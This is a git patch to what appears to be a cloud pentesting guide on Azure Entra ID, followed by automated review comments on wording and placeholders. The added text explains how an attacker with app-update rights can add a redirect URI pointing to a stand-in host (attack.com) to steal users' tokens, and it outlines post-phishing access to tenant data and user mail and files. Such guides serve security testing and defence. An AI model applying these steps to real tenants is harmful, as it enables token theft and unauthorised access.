From 713e9eb1abf4b07fede538187b25d1c9db79804b Mon Sep 17 00:00:00 2001 From: CPol Date: Sun, 1 Dec 2024 22:21:32 +0000 Subject: [PATCH] GITBOOK-719: No subject --- .../az-entraid-privesc/README.md | 18 ++++++++++++++++-- .../az-oauth-apps-phishing.md | 12 +++++++++++- 2 files changed, 27 insertions(+), 3 deletions(-) diff --git a/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md b/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md index dc65b707c7..533dd93bce 100644 --- a/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md +++ b/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md @@ -89,8 +89,7 @@ az ad app credential reset --id --append ### `microsoft.directory/applications/owners/update` -**Description**: Update owners of applications\ -**Abuse Potential**: By adding themselves as an owner, an attacker can manipulate the application, including credentials and permissions. +By adding themselves as an owner, an attacker can manipulate the application, including credentials and permissions. ```bash az ad app owner add --id --owner-object-id 
@@ -100,6 +99,21 @@ az ad app credential reset --id --append az ad app owner list --id ``` +### `microsoft.directory/applications/allProperties/update` + +An attacker can add a redirect URI to applications that are being used by users of the tenant and then share with them login URLs that use the new redirect URL in order to steal their tokens. Note that if the user was already logged in the application, the authentication is going to be automatic without the user needing to accept anything. + +Note that it's also possible to change the permissions the application requests in order to get more permissions, but in this case the user will need accept again the prompt asking for all the permissions. + +{% code overflow="wrap" %} +```bash +# Get current redirect uris +az ad app show --id ea693289-78f3-40c6-b775-feabd8bef32f --query "web.redirectUris" +# Add a new redirect URI (make sure to keep the configured ones) +az ad app update --id --web-redirect-uris "https://original.com/callback https://attack.com/callback" +``` +{% endcode %} + ## Service Principals ### `microsoft.directory/servicePrincipals/credentials/update` diff --git a/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.md b/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.md index 7b0bd267fd..540e9a615f 100644 --- a/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.md +++ b/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.md 
@@ -152,7 +152,17 @@ curl -X GET \ ## Post-Exploitation -Once you got access to the user you can do things such as stealing sensitive documents and even uploading backdoored document files. +### Phishing Post-Exploitation + +Depending on the requested permissions you might be able to **access different data of the tenant** (list users, groups... or even modify settings) and **information of the user** (files, notes, emails...). Then, you can use this permissions to perform those actions. + +### Application Post Exploitation + +Check the Applications and Service Principal sections of the page: + +{% content-ref url="../az-privilege-escalation/az-entraid-privesc/" %} +[az-entraid-privesc](../az-privilege-escalation/az-entraid-privesc/) +{% endcontent-ref %} ## References
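Review bot: the first README hunk (`@@ -89,8 +89,7 @@`, section `microsoft.directory/applications/owners/update`) deletes the `**Description**: Update owners of applications` line together with the `**Abuse Potential**` label, so the section now consists only of the misuse paragraph and never states what the permission itself grants; keep a one-line description of the permission (plain text is fine if the bold labels are being dropped) ahead of the abuse sentence. In the same hunk the context line `az ad app owner add --id --owner-object-id` renders with no values after either flag; if angle-bracket placeholders such as `<app-id>` and `<owner-object-id>` were lost on the way in, restore them so the command is readable.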
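Review bot: the two commands in the new `microsoft.directory/applications/allProperties/update` block (second README hunk, `@@ -100,6 +99,21 @@`) use inconsistent identifiers: `az ad app show` carries a concrete id `ea693289-78f3-40c6-b775-feabd8bef32f` while `az ad app update --id` has no value at all, so use the same placeholder in both and the reader can follow the show-then-update sequence. Because `--web-redirect-uris` replaces the whole list (which is why the comment says to keep the configured ones), state in the text that the new value must be the full existing list plus the added entry rather than relying on the comment alone. Wording: `if the user was already logged in the application` should read `logged in to the application`, and `the user will need accept again the prompt asking for all the permissions` should read `the user will need to accept the prompt for all the permissions again`.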
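Review bot: in the az-oauth-apps-phishing.md hunk (`@@ -152,7 +152,17 @@`) the two new subsection headings are hyphenated inconsistently, `### Phishing Post-Exploitation` versus `### Application Post Exploitation`; the parent `## Post-Exploitation` uses the hyphen, so apply it to both. In the first paragraph `you can use this permissions` should be `you can use these permissions`, and that closing sentence only restates the one before it, so it can be shortened or dropped. `Check the Applications and Service Principal sections of the page` should say `Service Principals` to match the `## Service Principals` heading of the linked README shown in the other hunk.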